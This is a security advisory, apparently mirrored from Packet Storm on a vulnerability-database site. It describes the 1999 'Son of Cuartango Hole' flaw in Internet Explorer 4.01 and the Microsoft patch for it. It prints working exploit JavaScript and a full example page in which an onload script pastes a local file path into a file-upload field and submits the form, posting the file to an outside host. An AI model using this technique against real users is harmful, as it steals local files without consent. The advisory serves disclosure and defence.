Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

cuartango-son.txt

πŸ—“οΈΒ 17 Aug 1999Β 00:00:00Reported byΒ Packet StormTypeΒ 
packetstorm
Β packetstormπŸ”—Β packetstormsecurity.comπŸ‘Β 19Β Views

Cuartango Hole exploits untrusted scripted paste in Internet Explorer; fix available from Microsoft.

Show more
Code
`The Son of Cuartango Hole   
  
http://pages.whowhere.com/computers/cuartangojc/son1.html  
  
Affected software  
Microsoft Internet Explorer 4.01  
  
Fixes  
Microsoft has released a fix : Microsoft Security Site   
http://www.microsoft.com/security/bulletins/ms98-015.asp  
Microsoft names the vulnerability as "Untrusted Scripted Paste".   
They have created a new USP patch.  
  
Technical description  
  
There is an input form field used to tranfer files from the browsing computer to a WEB site this  
input field is HTML coded as :  
  
<input type="file" name="filename" size="30">  
  
Theoretically this input field can be filled only by the user by clicking a "Browse" button or  
typing the file name.  
In order to avoid a security hole, script files are not allowed to modify the value of this  
input field, the sentence bellow will not work :  
  
document.forms[0].filename = "C:\config.sys";  
  
The Cuartango Hole revealed that a single scripted "copy and paste" operation could write a file  
name on the input field, Microsoft's old USP patch fixed this single "copy and paste"  
vulnerability.  
There is a workaround making the "paste" operation work again. The idea is : create a "textrange"  
object with the selection of the file input and then paste over this "textrange" object.   
  
The code below is a bit more sophisticated than the "Cuartango Hole" code :  
  
T1 is a hidden input field defined in a second form containing the file pathname to be copied to  
the clipboard.  
  
  
<body onload="getfile()">  
  
function getfile()  
{  
document.forms[1].T1.select();  
document.execCommand("copy");  
document.forms[0].filename.select();  
var rng = document.selection.createRange();  
rng.execCommand("paste");  
document.forms[0].submit();  
}  
  
The result is that the file is POSTED to the malicious WEB site defined in the form action  
property.  
A similar code will also work inside an HTML formatted e-mail.   
  
The Cuartango Hole code was very similar :  
  
function getfile()  
{  
document.forms[1].T1.select();  
document.execCommand("copy");  
document.forms[0].filename.select();  
document.execCommand("paste");  
document.forms[0].submit();  
}  
  
  
  
Example Exploit  
  
<html>  
  
<head>  
<meta name="keywords"  
content="son of cuartango hole,cuartango hole,cuartango hack,cuartango,security,security site,USP,USP patch,security web,hack,security,risk,hole,security hole,explorer">  
<title>Son of Cuartango Hole Test</title>  
<bgsound src="images/gallarda.mid" loop="-1">  
</head>  
  
<body onload="getfile()">  
<script language="JavaScript">  
  
function getfile()  
{  
document.forms[0].filename.select(); // onload="getfile()"  
var rng = document.selection.createRange();  
document.forms[1].T1.select();  
document.execCommand("copy");  
rng.execCommand("paste");  
if(document.forms[0].filename.value == "")  
alert("Your browser does not have the security hole");  
else  
alert("Security hole in browser -- " + navigator.userAgent );  
}  
  
</script>  
  
  
<p align="center"><big><font color="#FF0000"><big><big>The Son of Cuartango Hole Test</big></big></font></big><small></p>  
</small>  
  
<p align="center">&nbsp;</p>  
<small>  
  
<form enctype="multipart/form-data" method="post"  
action="http://www.angelfire.com/cgi-bin/bedit">  
<div align="center"><center><p><strong>This is a test to verify if you are affected by the  
Son of Cuartango Hole</strong>.<br>  
<strong>If file name (/test.txt) is made visible in the box below then you are effected.</strong></p>  
</center></div><div align="center"><center><p>&nbsp;<input type="file" name="filename"  
size="15"></p>  
</center></div>  
</form>  
  
<form method="POST">  
<input type="hidden" name="T1" value="/test.txt"><p>&nbsp;</p>  
</form>  
</small>  
  
<p align="center"><font size="3" color="#0000FF"><a  
  
href="http://pages.whowhere.com/computers/cuartangojc/son1.html"><strong>Back to Son Of  
Cuartango Hole page</strong></a></font></p>  
  
<p align="center">&nbsp;&nbsp;&nbsp; <a href="mailto:[email protected]">Juan  
Carlos GarcΓ­a Cuartango</a></p>  
  
<p align="center"><font face="Arial"><img src="/cgi-bin/Count.cgi" width="97" height="24"><small><br>  
</small></font></p>  
  
<p><font size="2" face="Garamond">Last update&nbsp;1998&nbsp; Nov 15 AΓ±o del SeΓ±or de  
1998 </font></p>  
</body>  
</html>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Aug 1999 00:00Current
cuartango holeinternet explorer vulnerabilityuntrusted scripted pastemicrosoft fixhtml input fieldsecurity patch.
19
.json
Report